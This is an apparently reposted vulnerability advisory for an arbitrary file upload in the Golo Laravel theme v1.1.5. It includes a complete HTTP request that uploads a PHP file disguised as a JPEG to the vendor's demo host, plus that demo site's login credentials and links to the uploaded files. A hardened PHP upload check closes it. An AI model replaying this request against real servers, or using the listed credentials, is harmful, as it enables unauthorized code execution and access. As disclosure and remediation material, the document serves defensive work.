Golo - Business Listing, City Travel Guide Laravel Theme v1.1.5 - Arbitrary File Upload
CVE:
Category: CWE-434
Price: Not specified
Severity: High
Author: Exploitalert Team
Risk: High
Exploitation Type: Remote
Date: 2020-07-13
CPE: cpe:/a:golothemes:golo_business_listing_city_travel_guide_theme_v1.1.5
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070070 Below is a copy:
[+] Exploit Title: Golo - Business Listing, City Travel Guide Laravel Theme v1.1.5 - Arbitrary File Upload
[+] Google Dork: n/a
[+] Date: 2020-07-02
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Uxper [ http://uxper.co ]
[+] Software Version: 1.1.5
[+] Software Link: https://codecanyon.net/item/golo-city-guide-laravel-theme/25785389
[+] Tested on: Debian 10
[+] CVE:
[+] CWE: CWE-434
### [ Info: ]
[i] An Arbitrary File Upload vulnerability was discovered in the Golo Laravel theme v1.1.5: the place-creation form (POST /place) accepts the file sent in the "thumb" field without checking its real type, so a PHP script submitted with a spoofed image/jpeg Content-Type is stored with its .php extension under the web-accessible /uploads/ directory (PoC links #1-#3); the same handler also accepts SVG (PoC link #4).
[i] Demo account: [email protected] / ASKDU@$HDNAJFN@# (login / password)
[i] PoC Link #1: https://lara-business.getgolo.com/uploads/5f09c6d90c71c_1594476249.php
[i] PoC Link #2: https://lara-business.getgolo.com/uploads/5f09c6dcdde81_1594476252.php
[i] PoC Link #3: https://lara-business.getgolo.com/uploads/5f09c6df3b17d_1594476255.php
[i] PoC Link #4: https://lara-business.getgolo.com/uploads/5f09c3f7ec959_1594475511.svg
### [ PoC: ]
[!] POST /place HTTP/1.1
Host: lara-business.getgolo.com
Content-Type: multipart/form-data; boundary=---------------------------24734096191242901897977687797
Content-Length: 4732
Origin: https://lara-business.getgolo.com
Referer: https://lara-business.getgolo.com/new-place
Cookie: [cookies_here]
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="_token"
i6gbRoTMcw6JP9U23pHR3b2IvxSDGrHSPJBroucJ
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="en[name]"
Night City
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="price_range"
4
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="en[description]"
PoC
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="category[]"
20
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="place_type[]"
33
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="amenities[]"
13
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="amenities[]"
9
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="amenities[]"
6
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="country_id"
11
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="city_id"
26
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="address"
31337
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="lat"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="lng"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="email"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="phone_number"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="website"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="social[0][name]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="social[0][url]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[0][title]"
Monday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[0][value]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[1][title]"
Tuesday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[1][value]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[2][title]"
Wednesday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[2][value]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[3][title]"
Thursday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[3][value]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[4][title]"
Friday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[4][value]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[5][title]"
Saturday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[5][value]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[6][title]"
Sunday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[6][value]"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="thumb"; filename="vladvector.php"
Content-Type: image/jpeg
<?php
phpinfo();
?>
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="gallery[]"
vladvector.php
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="video"
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="place_id"
-----------------------------24734096191242901897977687797--
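A hardened upload check, added here as an example and not code from the Golo theme or its author, that closes the gap the PoC relies on: the handler derives the file type from the bytes rather than the client's Content-Type or filename, chooses its own name, and stores the file where nothing executes it. It assumes plain PHP 7.4+ with the fileinfo and GD extensions and runs inside the request that received the upload.

```php
<?php
// Added example, not the Golo theme's own code: a hardened image-upload check for a
// "thumb"/"gallery[]" style handler. Assumes plain PHP 7.4+ with fileinfo and GD.

const ALLOWED_IMAGE_TYPES = [
    // MIME type detected from content => extension used when storing.
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
    'image/webp' => 'webp',
    // image/svg+xml is deliberately absent: SVG can embed script (PoC link #4).
];

// Returns the extension to store the file under, or null to reject it.
function safeImageExtension(string $tmpPath): ?string
{
    // 1. Sniff the type from content; $_FILES['type'] is the client's claim
    //    (the PoC sends "image/jpeg" for a .php file) and is never consulted.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($detected === false || !isset(ALLOWED_IMAGE_TYPES[$detected])) {
        return null;
    }
    // 2. Require a parseable raster image whose type agrees with step 1.
    $info = @getimagesize($tmpPath);
    if ($info === false || $info['mime'] !== $detected) {
        return null;
    }
    return ALLOWED_IMAGE_TYPES[$detected];
}

// Stores a validated upload under a random server-chosen name in $storageDir,
// which must not be a directory the web server executes scripts from.
// Returns the stored name, or null if the file was rejected.
function storeUpload(string $tmpPath, string $storageDir): ?string
{
    $ext = safeImageExtension($tmpPath);
    if ($ext === null) {
        return null;
    }
    // The client filename (e.g. "vladvector.php") is discarded entirely.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($storageDir, '/') . '/' . $name;
    // move_uploaded_file() refuses paths that are not genuine PHP uploads.
    if (!move_uploaded_file($tmpPath, $dest)) {
        return null;
    }
    chmod($dest, 0640); // readable by the app, never executable
    return $name;
}
```

In a Laravel controller the same effect comes from validating the field with the `image` and `mimes:` rules and saving it with `store()` on a non-public disk; that is an assumed fix, not the vendor's patch.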
### [ Contacts: ]
[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector